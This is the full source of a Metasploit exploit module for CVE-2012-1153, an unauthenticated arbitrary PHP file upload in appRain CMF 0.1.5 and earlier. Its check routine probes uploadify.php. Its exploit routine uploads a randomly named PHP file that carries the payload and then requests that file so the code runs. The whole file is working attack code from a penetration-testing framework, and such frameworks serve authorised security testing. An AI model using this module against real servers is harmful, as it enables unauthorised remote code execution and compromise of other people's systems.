Path: blob/master/modules/exploits/multi/http/apprain_upload_exec.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient910def initialize(info = {})11super(12update_info(13info,14'Name' => "appRain CMF Arbitrary PHP File Upload Vulnerability",15'Description' => %q{16This module exploits a vulnerability found in appRain's Content Management17Framework (CMF), version 0.1.5 or less. By abusing the uploadify.php file, a18malicious user can upload a file to the uploads/ directory without any19authentication, which results in arbitrary code execution.20},21'License' => MSF_LICENSE,22'Author' => [23'EgiX', # Discovery, PoC24'sinn3r' # Metasploit25],26'References' => [27['CVE', '2012-1153'],28['OSVDB', '78473'],29['EDB', '18392'],30['BID', '51576']31],32'Payload' => {33'BadChars' => "\x00"34},35'DefaultOptions' => {36'EXITFUNC' => 'thread'37},38'Platform' => ['php'],39'Arch' => ARCH_PHP,40'Targets' => [41['appRain 0.1.5 or less', {}]42],43'Privileged' => false,44'DisclosureDate' => '2012-01-19',45'DefaultTarget' => 0,46'Notes' => {47'Reliability' => UNKNOWN_RELIABILITY,48'Stability' => UNKNOWN_STABILITY,49'SideEffects' => UNKNOWN_SIDE_EFFECTS50}51)52)5354register_options(55[56OptString.new('TARGETURI', [true, 'The base path to appRain', '/appRain-q-0.1.5'])57]58)59end6061def check62uri = target_uri.path63uri << '/' if uri[-1, 1] != '/'6465res = send_request_cgi({66'method' => 'GET',67'uri' => normalize_uri(uri, 'addons/uploadify/uploadify.php')68})6970if res and res.code == 200 and res.body.empty?71return Exploit::CheckCode::Appears72else73return Exploit::CheckCode::Safe74end75end7677def exploit78uri = target_uri.path7980peer = "#{rhost}:#{rport}"81payload_name = Rex::Text.rand_text_alpha(rand(10) + 5) + '.php'8283post_data = "--o0oOo0o\r\n"84post_data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{payload_name}\"\r\n\r\n"85post_data << "<?php "86post_data << payload.encoded87post_data << " ?>\r\n"88post_data << "--o0oOo0o\r\n"8990print_status("Sending PHP payload (#{payload_name})")91res = send_request_cgi({92'method' => 'POST',93'uri' => normalize_uri(uri, "addons/uploadify/uploadify.php"),94'ctype' => 'multipart/form-data; boundary=o0oOo0o',95'data' => post_data96})9798# If the server returns 200 and the body contains our payload name,99# we assume we uploaded the malicious file successfully100if not res or res.code != 200 or res.body !~ /#{payload_name}/101print_error("File wasn't uploaded, aborting!")102return103end104105print_status("Executing PHP payload (#{payload_name})")106# Execute our payload107res = send_request_cgi({108'method' => 'GET',109'uri' => normalize_uri(uri, "addons/uploadify/uploads/#{payload_name}")110})111112# If we don't get a 200 when we request our malicious payload, we suspect113# we don't have a shell, either. Print the status code for debugging purposes.114if res and res.code != 200115print_status("Server returned #{res.code.to_s}")116end117end118end119120121